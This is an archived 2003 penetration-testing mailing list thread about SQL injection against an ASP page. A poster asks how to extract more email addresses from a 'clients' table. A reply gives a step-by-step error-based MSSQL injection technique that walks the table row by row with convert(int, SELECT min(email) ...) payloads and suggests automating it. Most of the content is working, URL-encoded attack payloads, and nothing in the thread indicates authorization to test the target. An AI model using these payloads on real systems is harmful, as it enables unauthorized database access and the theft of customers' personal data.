Penetration Testing mailing list archives
RE: SQL injection - get more values
From: "Brass, Phil (ISS Atlanta)" <PBrass () iss net>
Date: Wed, 12 Feb 2003 14:05:02 -0500
I believe the solution you're looking for is the old min-where-order-by trick.
' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b
' Try this:
' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'a'
order by 1)) %2b ' After you get the first value (say it's anon () isp com), you throw it into the where clause:
' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
'anon () isp com' order by 1)) %2b ' You get the next value, say it's axon () isp com, then you do the next query:
' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
'axon () isp com' order by 1)) %2b ' And so on, until you don't get an error. Of course, for most gratifying results you write a little program that does this for you. Phil
-----Original Message----- From: Daniel Savi [mailto:dss () brturbo com] Sent: Wednesday, February 12, 2003 12:49 PM To: pen-test () securityfocus com Subject: SQL injection - get more values Hi :) i'm trying to get some info from clients table and email field.... i try this param into gubpage.asp?=... ') union select sum(email) from clients-- and got error about all queries needed...so, i tryed to solve with ') union select sum(email),1,1,1.... from clients-- until i get: operand type clash: text is incompatible with int i found this answer into this forum (thanks :)), was: ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b ' i got this: Syntax error converting the varchar value 'anon () isp com' to a column of data type int Now, my problem: How can i get other e-mail from table knowing one valid value? i try this ' %2b convert(int, (SELECT email FROM clients WHERE email'anon () isp com')) %2b 'but no success i think i can use NOT iN, but not sure how to use with convert... Any tip are welcome! Thanks -------------------------------------------------------------- -------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- SQL injection - get more values Daniel Savi (Feb 12)
- RE: SQL injection - get more values Panos Dimitriou (Feb 12)
- RE: SQL injection - get more values Cesar (Feb 12)
- Re: SQL injection - get more values Thaidn (Feb 13)
- Re: SQL injection - get more values Thaidn (Feb 12)
- Re: SQL injection - get more values Kevin Spett (Feb 13)
- Re: SQL injection - get more values Kevin Spett (Feb 12)
- <Possible follow-ups>
- RE: SQL injection - get more values Brass, Phil (ISS Atlanta) (Feb 12)
- RE: SQL injection - get more values Panos Dimitriou (Feb 12)